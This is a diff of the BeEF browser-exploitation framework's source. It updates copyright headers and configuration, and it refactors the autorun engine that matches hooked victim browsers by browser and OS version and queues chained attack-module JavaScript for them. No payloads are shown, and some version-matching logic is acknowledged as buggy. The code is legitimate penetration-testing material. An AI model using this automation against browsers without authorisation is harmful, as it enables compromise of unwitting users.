@@ -242,6 +248,8 @@ BeEF::Core::Console::Banners.print_loaded_extensions
 BeEF::Core::Console::Banners.print_loaded_modules
 BeEF::Core::Console::Banners.print_network_interfaces_count
 BeEF::Core::Console::Banners.print_network_interfaces_routes
+BeEF::Core::Console::Banners.print_http_proxy
+BeEF::Core::Console::Banners.print_dns
 
 #
 # @note Prints the API key needed to use the RESTful API

config.yaml

@@ -1,12 +1,12 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file
 
 beef:
-    version: '0.5.4.0'
+    version: '0.6.0.0'
     # More verbose messages (server-side)
     debug: false
     # More verbose messages (client-side)
@@ -45,22 +45,23 @@ beef:
         # Enabling WebSockets is generally better (beef.websocket.enable)
         xhr_poll_timeout: 1000
 
-        # Host Name / Domain Name
-        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
-        # These settings will be used to create a public facing URL
-        # This public facing URL will be used for all hook related calls
-        # set the public setting below:
-        # public:
-        #     host: "" # public hostname/IP address
-        #     port: "" # public port will default to 80 if no https 443 if https 
-                      # and local if not set but there is a public host
-        #     https: false # true/false
+        # Public Domain Name / Reverse Proxy / Port Forwarding
+        #
+        # In order for the client-side BeEF JavaScript hook to be able to connect to BeEF,
+        # the hook JavaScript needs to be generated with the correct connect-back details.
+        #
+        # If you're using a public domain name, reverse proxy, or port forwarding you must
+        # configure the public-facing connection details here.
 
-        # Reverse Proxy / NAT
-        # If you want BeEF to be accessible behind a reverse proxy or NAT,
-        #   set both the publicly accessible hostname/IP address and port below:
-        # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
-        #   by altering the X-FORWARDED-FOR ip address in the request header.
+        #public:
+        #    host: "beef.local" # public hostname/IP address
+        #    port: "443" # public port (443 if the public server is using HTTPS)
+        #    https: false # true/false
+
+        # If using any reverse proxy you should also set allow_reverse_proxy to true below.
+        # Note that this causes the BeEF server to trust the X-Forwarded-For HTTP header.
+        # If the BeEF server is directly accessible, clients can spoof their connecting
+        # IP address using this header to bypass the IP address permissions/exclusions.
         allow_reverse_proxy: false
 
         # Hook
@@ -93,8 +94,6 @@ beef:
         # Experimental HTTPS support for the hook / admin / all other Thin managed web services
         https:
             enable: false
-            # Enabled this config setting if you're external facing uri is using https
-            public_enabled: false
             # In production environments, be sure to use a valid certificate signed for the value
             # used in beef.http.public (the domain name of the server where you run BeEF)
             key: "beef_key.pem"
@@ -125,13 +124,6 @@ beef:
         # GeoLite2 City database created by MaxMind, available from https://www.maxmind.com
         database: '/usr/share/GeoIP/GeoLite2-City.mmdb'
 
-    # Integration with PhishingFrenzy
-    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
-    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
-    integration:
-        phishing_frenzy:
-            enable: false
-
     # You may override default extension configuration parameters here
     # Note: additional experimental extensions are available in the 'extensions' directory
     #       and can be enabled via their respective 'config.yaml' file
@@ -154,6 +146,6 @@ beef:
         metasploit:
             enable: false
         social_engineering:
-            enable: true
+            enable: false
         xssrays:
             enable: true

core/api.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
@@ -29,7 +29,7 @@ module BeEF
       #
       def register(owner, clss, method, params = [])
         unless verify_api_path(clss, method)
-          print_error "API Registrar: Attempted to register non-existant API method #{clss} :#{method}"
+          print_error "API Registrar: Attempted to register non-existent API method #{clss} :#{method}"
           return
         end
 
@@ -184,7 +184,7 @@ module BeEF
         mods = get_owners(clss, mthd, args)
         return nil unless mods.length.positive?
 
-        unless verify_api_path(clss, mthd) && clss.ancestors[0].to_s > 'BeEF::API'
+        unless verify_api_path(clss, mthd) && clss.ancestors.first.to_s.start_with?('BeEF::API')
           print_error "API Path not defined for Class: #{clss} method: #{mthd}"
           return []
         end

core/api/extension.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/api/extensions.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/main/configuration.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/main/migration.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/main/network_stack/assethandler.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/main/server.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/main/server/hook.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/module.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/api/modules.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/bootstrap.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/core.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/extension.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/extensions.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/filters.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/filters/base.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/filters/browser.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -46,7 +46,7 @@ module BeEF
       return false if has_non_printable_char?(str)
       return true if str.eql? 'UNKNOWN'
       return true if str.eql? 'ALL'
-      return false if !nums_only?(str) and !is_valid_float?(str)
+      return false if !nums_only?(str) and !str.match(/\A(0|[1-9][0-9]{0,3})(\.(0|[1-9][0-9]{0,3})){0,3}\z/)
       return false if str.length > 20
 
       true

core/filters/command.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/filters/http.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/filters/page.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/hbmanager.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF

core/loader.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/logger.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 

core/main/ar-migrations/012_create_mass_mailer.rb

@@ -1,7 +0,0 @@
-class CreateMassMailer < ActiveRecord::Migration[6.0]
-  def change
-    create_table :mass_mailers do |t|
-      # TODO: fields
-    end
-  end
-end

core/main/ar-migrations/015_create_http.rb

@@ -4,8 +4,8 @@ class CreateHttp < ActiveRecord::Migration[6.0]
       t.text :hooked_browser_id
       # The http request to perform. In clear text.
       t.text :request
-      # Boolean value as string to say whether cross-domain requests are allowed
-      t.boolean :allow_cross_domain, default: true
+      # Boolean value as string to say whether cross-origin requests are allowed
+      t.boolean :allow_cross_origin, default: true
       # The http response body received. In clear text.
       t.text :response_data
       # The http response code. Useful to handle cases like 404, 500, 302, ...
@@ -26,7 +26,7 @@ class CreateHttp < ActiveRecord::Migration[6.0]
       t.text :domain
       # The port on which perform the request.
       t.text :port
-      # Boolean value to say if the request was cross-domain
+      # Boolean value to say if the request was cross-origin
       t.text :has_ran, default: 'waiting'
       # The path of the request.
       # Example: /secret.html

core/main/ar-migrations/022_create_ipec_exploit.rb

@@ -1,9 +0,0 @@
-class CreateIpecExploit < ActiveRecord::Migration[6.0]
-  def change
-    create_table :ipec_exploits do |t|
-      t.text :name
-      t.text :protocol
-      t.text :os
-    end
-  end
-end

core/main/ar-migrations/023_create_ipec_exploit_run.rb

@@ -1,9 +0,0 @@
-class CreateIpecExploitRun < ActiveRecord::Migration[6.0]
-  def change
-    create_table :ipec_exploit_runs do |t|
-      t.boolean :launched
-      t.text :http_headers
-      t.text :junk_size
-    end
-  end
-end

core/main/ar-migrations/025_create_xssrays_scan.rb

@@ -5,7 +5,7 @@ class CreateXssraysScan < ActiveRecord::Migration[6.0]
       t.datetime :scan_start
       t.datetime :scan_finish
       t.text :domain
-      t.text :cross_domain
+      t.text :cross_origin
       t.integer :clean_timeout
       t.boolean :is_started
       t.boolean :is_finished

core/main/autorun_engine/engine.rb

@@ -1,6 +1,6 @@
 #
-# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
@@ -19,31 +19,243 @@ module BeEF
           @debug_on = @config.get('beef.debug')
 
           @VERSION = ['<', '<=', '==', '>=', '>', 'ALL']
-          @VERSION_STR = %w[XP Vista]
+          @VERSION_STR = %w[XP Vista 7]
+        end
+
+        # Checks if there are any ARE rules to be triggered for the specified hooked browser.
+        #
+        # Returns an array with rule IDs that matched and should be triggered.
+        # if rule_id is specified, checks will be executed only against the specified rule (useful
+        #  for dynamic triggering of new rulesets ar runtime)
+        def find_matching_rules_for_zombie(browser, browser_version, os, os_version)
+          rules = BeEF::Core::Models::Rule.all
+
+          return if rules.nil?
+          return if rules.empty?
+
+          # TODO: handle cases where there are multiple ARE rules for the same hooked browser.
+          # maybe rules need to have priority or something?
+
+          print_info '[ARE] Checking if any defined rules should be triggered on target.'
+
+          match_rules = []
+          rules.each do |rule|
+            next unless zombie_matches_rule?(browser, browser_version, os, os_version, rule)
+
+            match_rules.push(rule.id)
+            print_more("Hooked browser and OS match rule: #{rule.name}.")
+          end
+
+          print_more("Found [#{match_rules.length}/#{rules.length}] ARE rules matching the hooked browser.")
+
+          match_rules
+        end
+
+        # @return [Boolean]
+        # Note: browser version checks are supporting only major versions, ex: C 43, IE 11
+        # Note: OS version checks are supporting major/minor versions, ex: OSX 10.10, Windows 8.1
+        def zombie_matches_rule?(browser, browser_version, os, os_version, rule)
+          return false if rule.nil?
+
+          unless zombie_browser_matches_rule?(browser, browser_version, rule)
+            print_debug("Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : does not match")
+            return false
+          end
+
+          print_debug("Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : matched")
+
+          unless zombie_os_matches_rule?(os, os_version, rule)
+            print_debug("OS version check -> (hook) #{os_version} #{rule.os_version} (rule): does not match")
+            return false
+          end
+
+          print_debug("OS version check -> (hook) #{os_version} #{rule.os_version} (rule): matched")
+
+          true
+        rescue StandardError => e
+          print_error e.message
+          print_debug e.backtrace.join("\n")
+        end
+
+        # @return [Boolean]
+        # TODO: This should be updated to support matching multiple OS (like the browser check below)
+        def zombie_os_matches_rule?(os, os_version, rule)
+          return false if rule.nil?
+
+          return false unless rule.os == 'ALL' || os == rule.os
+
+          # check if the OS versions match
+          os_ver_rule_cond = rule.os_version.split(' ').first
+
+          return true if os_ver_rule_cond == 'ALL'
+
+          return false unless @VERSION.include?(os_ver_rule_cond) || @VERSION_STR.include?(os_ver_rule_cond)
+
+          os_ver_rule_maj = rule.os_version.split(' ').last.split('.').first
+          os_ver_rule_min = rule.os_version.split(' ').last.split('.').last
+
+          if os_ver_rule_maj == 'XP'
+            os_ver_rule_maj = 5
+            os_ver_rule_min = 0
+          elsif os_ver_rule_maj == 'Vista'
+            os_ver_rule_maj = 6
+            os_ver_rule_min = 0
+          elsif os_ver_rule_maj == '7'
+            os_ver_rule_maj = 6
+            os_ver_rule_min = 0
+          end
+
+          # Most of the times Linux/*BSD OS doesn't return any version
+          # (TODO: improve OS detection on these operating systems)
+          if !os_version.nil? && !@VERSION_STR.include?(os_version)
+            os_ver_hook_maj = os_version.split('.').first
+            os_ver_hook_min = os_version.split('.').last
+
+            # the following assignments to 0 are need for later checks like:
+            # 8.1 >= 7, because if the version doesn't have minor versions, maj/min are the same
+            os_ver_hook_min = 0 if os_version.split('.').length == 1
+            os_ver_rule_min = 0 if rule.os_version.split('.').length == 1
+          else
+            # XP is Windows 5.0 and Vista is Windows 6.0. Easier for comparison later on.
+            # TODO: BUG: This will fail horribly if the target OS is Windows 7 or newer,
+            # as no version normalization is performed.
+            # TODO: Update this for every OS since Vista/7 ...
+            if os_version == 'XP'
+              os_ver_hook_maj = 5
+              os_ver_hook_min = 0
+            elsif os_version == 'Vista'
+              os_ver_hook_maj = 6
+              os_ver_hook_min = 0
+            elsif os_version == '7'
+              os_ver_hook_maj = 6
+              os_ver_hook_min = 0
+            end
+          end
+
+          if !os_version.nil? || rule.os_version != 'ALL'
+            os_major_version_match = compare_versions(os_ver_hook_maj.to_s, os_ver_rule_cond, os_ver_rule_maj.to_s)
+            os_minor_version_match = compare_versions(os_ver_hook_min.to_s, os_ver_rule_cond, os_ver_rule_min.to_s)
+            return false unless (os_major_version_match && os_minor_version_match)
+          end
+
+          true
+        rescue StandardError => e
+          print_error e.message
+          print_debug e.backtrace.join("\n")
+        end
+
+        # @return [Boolean]
+        def zombie_browser_matches_rule?(browser, browser_version, rule)
+          return false if rule.nil?
+
+          b_ver_cond = rule.browser_version.split(' ').first
+
+          return false unless @VERSION.include?(b_ver_cond)
+
+          b_ver = rule.browser_version.split(' ').last
+
+          return false unless BeEF::Filters.is_valid_browserversion?(b_ver)
+
+          # check if rule specifies multiple browsers
+          if rule.browser =~ /\A[A-Z]+\Z/
+              return false unless rule.browser == 'ALL' || browser == rule.browser
+
+              # check if the browser version matches
+              browser_version_match = compare_versions(browser_version.to_s, b_ver_cond, b_ver.to_s)
+              return false unless browser_version_match
+            else
+              browser_match = false
+              rule.browser.gsub(/[^A-Z,]/i, '').split(',').each do |b|
+                if b == browser || b == 'ALL'
+                  browser_match = true
+                  break
+                end
+              end
+              return false unless browser_match
+          end
+
+          true
+        rescue StandardError => e
+          print_error e.message
+          print_debug e.backtrace.join("\n")
         end
 
         # Check if the hooked browser type/version and OS type/version match any Rule-sets
-        # stored in the BeEF::Core::AutorunEngine::Models::Rule database table
+        # stored in the BeEF::Core::Models::Rule database table
         # If one or more Rule-sets do match, trigger the module chain specified
-        def run(hb_id, browser_name, browser_version, os_name, os_version)
+        def find_and_run_all_matching_rules_for_zombie(hb_id)
+          return if hb_id.nil?
+
+          hb_details = BeEF::Core::Models::BrowserDetails
+          browser_name = hb_details.get(hb_id, 'browser.name')
+          browser_version = hb_details.get(hb_id, 'browser.version')
+          os_name = hb_details.get(hb_id, 'host.os.name')
+          os_version = hb_details.get(hb_id, 'host.os.version')
+
           are = BeEF::Core::AutorunEngine::Engine.instance
-          match_rules = are.match(browser_name, browser_version, os_name, os_version)
-          are.trigger(match_rules, hb_id) if !match_rules.nil? && match_rules.length > 0
+          rules = are.find_matching_rules_for_zombie(browser_name, browser_version, os_name, os_version)
+
+          return if rules.nil?
+          return if rules.empty?
+
+          are.run_rules_on_zombie(rules, hb_id)
         end
 
+        # Run the specified rule IDs on the specified zombie ID
+        # only if the rules match.
+        def run_matching_rules_on_zombie(rule_ids, hb_id)
+          return if rule_ids.nil?
+          return if hb_id.nil?
+
+          rule_ids = [rule_ids.to_i] if rule_ids.is_a?(String)
+
+          hb_details = BeEF::Core::Models::BrowserDetails
+          browser_name = hb_details.get(hb_id, 'browser.name')
+          browser_version = hb_details.get(hb_id, 'browser.version')
+          os_name = hb_details.get(hb_id, 'host.os.name')
+          os_version = hb_details.get(hb_id, 'host.os.version')
+
+          are = BeEF::Core::AutorunEngine::Engine.instance
+          rules = are.find_matching_rules_for_zombie(browser_name, browser_version, os_name, os_version)
+
+          return if rules.nil?
+          return if rules.empty?
+
+          new_rules = []
+          rules.each do |rule|
+            new_rules << rule if rule_ids.include?(rule)
+          end
+
+          return if new_rules.empty?
+
+          are.run_rules_on_zombie(new_rules, hb_id)
+        end
+
+        # Run the specified rule IDs on the specified zombie ID
+        # regardless of whether the rules match.
         # Prepare and return the JavaScript of the modules to be sent.
         # It also updates the rules ARE execution table with timings
-        def trigger(rule_ids, hb_id)
+        def run_rules_on_zombie(rule_ids, hb_id)
+          return if rule_ids.nil?
+          return if hb_id.nil?
+
           hb = BeEF::HBManager.get_by_id(hb_id)
           hb_session = hb.session
 
+          rule_ids = [rule_ids] if rule_ids.is_a?(Integer)
+
           rule_ids.each do |rule_id|
             rule = BeEF::Core::Models::Rule.find(rule_id)
             modules = JSON.parse(rule.modules)
 
             execution_order = JSON.parse(rule.execution_order)
             execution_delay = JSON.parse(rule.execution_delay)
-            chain_mode  = rule.chain_mode
+            chain_mode = rule.chain_mode
+
+            unless %w[sequential nested-forward].include?(chain_mode)
+              print_error("[ARE] Invalid chain mode '#{chain_mode}' for rule")
+              return
+            end
 
             mods_bodies = []
             mods_codes = []
@@ -76,11 +288,13 @@ module BeEF
             when 'sequential'
               wrapper = prepare_sequential_wrapper(mods_bodies, execution_order, execution_delay, rule_token)
             else
-              wrapper = nil
-              print_error 'Chain mode looks wrong!'
-              # TODO: catch error, which should never happen as values are checked way before ;-)
+              # we should never get here. chain mode is validated earlier.
+              print_error("[ARE] Invalid chain mode '#{chain_mode}'")
+              next
             end
 
+            print_more "Triggering rules #{rule_ids} on HB #{hb_id}"
+
             are_exec = BeEF::Core::Models::Execution.new(
               session_id: hb_session,
               mod_count: modules.length,
@@ -88,14 +302,14 @@ module BeEF
               rule_token: rule_token,
               mod_body: wrapper,
               is_sent: false,
-              id: rule_id
+              rule_id: rule_id
             )
             are_exec.save!
-            # Once Engine.check() verified that the hooked browser match a Rule, trigger the Rule ;-)
-            print_more "Triggering ruleset #{rule_ids} on HB #{hb_id}"
           end
         end
 
+        private
+
         # Wraps module bodies in their own function, using setTimeout to trigger them with an eventual delay.
         # Launch order is also taken care of.
         #  - sequential chain with delays (setTimeout stuff)
@@ -339,20 +553,18 @@ module BeEF
           print_error '[ARE] Could not find module end index' if wrapper_end_index.nil?
 
           cleaned_cmd_body = cmd_body.slice(wrapper_start_index..-(wrapper_end_index + 1)).join("\n")
+
           print_error '[ARE] No command to send' if cleaned_cmd_body.eql?('')
 
           # check if <<mod_input>> should be replaced with a variable name (depending if the variable is a string or number)
-          if replace_input
-            if cleaned_cmd_body.include?('"<<mod_input>>"')
-              final_cmd_body = cleaned_cmd_body.gsub('"<<mod_input>>"', 'mod_input')
-            elsif cleaned_cmd_body.include?('\'<<mod_input>>\'')
-              final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input')
-            elsif cleaned_cmd_body.include?('<<mod_input>>')
-              final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input')
-            else
-              return cleaned_cmd_body
-            end
-            final_cmd_body
+          return cleaned_cmd_body unless replace_input
+
+          if cleaned_cmd_body.include?('"<<mod_input>>"')
+            cleaned_cmd_body.gsub('"<<mod_input>>"', 'mod_input')
+          elsif cleaned_cmd_body.include?('\'<<mod_input>>\'')
+            cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input')
+          elsif cleaned_cmd_body.include?('<<mod_input>>')
+            cleaned_cmd_body.gsub('\'<<mod_input>>\'', 'mod_input')
           else
             cleaned_cmd_body
           end
@@ -360,129 +572,6 @@ module BeEF
           print_error "[ARE] There is likely a problem with the module's command.js parsing. Check Engine.clean_command_body. #{e.message}"
         end
 
-        # Checks if there are any ARE rules to be triggered for the specified hooked browser
-        #
-        # Note: browser version checks are supporting only major versions, ex: C 43, IE 11
-        # Note: OS version checks are supporting major/minor versions, ex: OSX 10.10, Windows 8.1
-        #
-        # Returns an array with rule IDs that matched and should be triggered.
-        # if rule_id is specified, checks will be executed only against the specified rule (useful
-        #  for dynamic triggering of new rulesets ar runtime)
-        def match(browser, browser_version, os, os_version, rule_id = nil)
-          match_rules = []
-          rules = if rule_id.nil?
-                    BeEF::Core::Models::Rule.all
-                  else
-                    [BeEF::Core::Models::Rule.find(rule_id)]
-                  end
-          return nil if rules.nil?
-          return nil unless rules.length > 0
-
-          print_info '[ARE] Checking if any defined rules should be triggered on target.'
-          # TODO: handle cases where there are multiple ARE rules for the same hooked browser.
-          # TODO the above works well, but maybe rules need to have priority or something?
-          rules.each do |rule|
-            browser_match = false
-            os_match = false
-
-            b_ver_cond = rule.browser_version.split(' ').first
-            b_ver = rule.browser_version.split(' ').last
-
-            os_ver_rule_cond = rule.os_version.split(' ').first
-            os_ver_rule_maj = rule.os_version.split(' ').last.split('.').first
-            os_ver_rule_min = rule.os_version.split(' ').last.split('.').last
-
-            # Most of the times Linux/*BSD OS doesn't return any version
-            # (TODO: improve OS detection on these operating systems)
-            if !os_version.nil? && !@VERSION_STR.include?(os_version)
-              os_ver_hook_maj = os_version.split('.').first
-              os_ver_hook_min = os_version.split('.').last
-
-              # the following assignments to 0 are need for later checks like:
-              # 8.1 >= 7, because if the version doesn't have minor versions, maj/min are the same
-              os_ver_hook_min = 0 if os_version.split('.').length == 1
-              os_ver_rule_min = 0 if rule.os_version.split('.').length == 1
-            else
-              # most probably Windows XP or Vista. the following is a hack as Microsoft had the brilliant idea
-              # to switch from strings to numbers in OS versioning. To prevent rewriting code later on,
-              # we say that XP is Windows 5.0 and Vista is Windows 6.0. Easier for comparison later on.
-              if os_version == 'XP'
-                os_ver_hook_maj = 5
-                os_ver_hook_min = 0
-              end
-              if os_version == 'Vista'
-                os_ver_hook_maj = 6
-                os_ver_hook_min = 0
-              end
-            end
-
-            if os_ver_rule_maj == 'XP'
-              os_ver_rule_maj = 5
-              os_ver_rule_min = 0
-            end
-            if os_ver_rule_maj == 'Vista'
-              os_ver_rule_maj = 6
-              os_ver_rule_min = 0
-            end
-
-            next unless @VERSION.include?(b_ver_cond)
-            next unless BeEF::Filters.is_valid_browserversion?(b_ver)
-
-            next unless @VERSION.include?(os_ver_rule_cond) || @VERSION_STR.include?(os_ver_rule_cond)
-
-            # os_ver without checks as it can be very different or even empty, for instance on linux/bsd)
-
-            # skip rule unless the browser matches
-            browser_match = false
-            # check if rule specifies multiple browsers
-            if rule.browser =~ /\A[A-Z]+\Z/
-              next unless rule.browser == 'ALL' || browser == rule.browser
-
-              # check if the browser version matches
-              browser_version_match = compare_versions(browser_version.to_s, b_ver_cond, b_ver.to_s)
-              browser_match = if browser_version_match
-                                true
-                              else
-                                false
-                              end
-              print_more "Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : #{browser_version_match}"
-            else
-              rule.browser.gsub(/[^A-Z,]/i, '').split(',').each do |b|
-                browser_match = true if b == browser || b == 'ALL'
-              end
-              # else, only one browser
-            end
-            next unless browser_match
-
-            # skip rule unless the OS matches
-            next unless rule.os == 'ALL' || os == rule.os
-
-            # check if the OS versions match
-            if !os_version.nil? || rule.os_version != 'ALL'
-              os_major_version_match = compare_versions(os_ver_hook_maj.to_s, os_ver_rule_cond, os_ver_rule_maj.to_s)
-              os_minor_version_match = compare_versions(os_ver_hook_min.to_s, os_ver_rule_cond, os_ver_rule_min.to_s)
-            else
-              # os_version_match = true if (browser doesn't return an OS version || rule OS version is ALL )
-              os_major_version_match = true
-              os_minor_version_match = true
-            end
-
-            os_match = true if os_ver_rule_cond == 'ALL' || (os_major_version_match && os_minor_version_match)
